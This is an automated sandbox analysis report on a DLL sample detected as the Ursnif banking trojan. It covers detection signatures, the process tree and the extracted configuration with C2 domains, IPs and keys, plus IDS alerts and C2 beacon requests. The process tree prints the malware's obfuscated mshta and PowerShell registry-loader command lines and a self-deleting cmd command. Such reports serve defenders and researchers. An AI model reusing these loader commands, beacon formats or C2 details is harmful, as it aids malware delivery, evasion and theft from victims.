Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tIJVb0BvkI.dll

Overview

General Information

Sample Name:tIJVb0BvkI.dll
Analysis ID:620333
MD5:f28f39ada498d66c378fd59227e0f215
SHA1:1c9c0584ad51f5be3f16b334d758c88b8cdb7b38
SHA256:0a66e8376fc6d9283e500c6e774dc0a109656fd457a0ce7dbf40419bc8d50936
Tags:dllgeoGoziISFBITAUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6904 cmdline: loaddll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6984 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7020 cmdline: rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4324 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 5832 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 2464 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 3808 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  • mshta.exe (PID: 6756 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5612 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5896 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3368 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4168 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.1060000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              3.3.rundll32.exe.4b694a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                3.3.rundll32.exe.500a4a0.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  3.3.rundll32.exe.50894a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    3.3.rundll32.exe.4b694a0.10.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 4 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:05/04/22-16:27:52.293372 05/04/22-16:27:52.293372
                      SID:2033203
                      Source Port:49738
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:28:12.405919 05/04/22-16:28:12.405919
                      SID:2033203
                      Source Port:49758
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:28:12.829578 05/04/22-16:28:12.829578
                      SID:2033204
                      Source Port:49758
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted file
                      Source: tIJVb0BvkI.dllReversingLabs: Detection: 47%
                      Machine Learning detection for sample
                      Source: tIJVb0BvkI.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01065FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                      Source: tIJVb0BvkI.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.578381495.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.582897274.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: tIJVb0BvkI.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.578381495.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.582897274.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49738 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49738 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49758 -> 185.189.151.28:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49758 -> 185.189.151.28:80
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: Joe Sandbox ViewASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
                      Source: global trafficHTTP traffic detected: GET /drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBrJhjkbJ6O/93dARdUH_2FoHr_2FV/0rrTpy9pc/1HdKJKRhTt7WBB4IQK6y/YM407RHM4U2q_2BMJQz/BPrYtABTFqi6nvzwRvIVUe/ZccTd3lUnONRt/36Ya8mGx/TeFUFTZ_2BUkjcjLP_2BV5Q/RmDIE1kWYj/OUKtn8nbT_2FNqVm2/qgQV8CVfL5vg/g3ZAMbEOx9s/O0o9X0KU42gffO/GcaP_2Fr_/2BV4K.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/
                      Source: rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/A_2Fp
                      Source: rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umz
                      Source: rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBr
                      Source: rundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642541789.0000000000A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBrJhjkbJ6O/93d
                      Source: rundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQ
                      Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517515689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642709206.0000000000AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLE
                      Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/ws
                      Source: rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642779966.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/5_2BPw3OSauP4MGGq6siPB/_2BnCqBYV_2Ft/k9TDCaV5/kdb0RbX2RH_2FsWBq58E
                      Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 0000000A.00000003.604947338.00000227AB271000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
                      Source: rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01061CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
                      Source: global trafficHTTP traffic detected: GET /drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBrJhjkbJ6O/93dARdUH_2FoHr_2FV/0rrTpy9pc/1HdKJKRhTt7WBB4IQK6y/YM407RHM4U2q_2BMJQz/BPrYtABTFqi6nvzwRvIVUe/ZccTd3lUnONRt/36Ya8mGx/TeFUFTZ_2BUkjcjLP_2BV5Q/RmDIE1kWYj/OUKtn8nbT_2FNqVm2/qgQV8CVfL5vg/g3ZAMbEOx9s/O0o9X0KU42gffO/GcaP_2Fr_/2BV4K.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
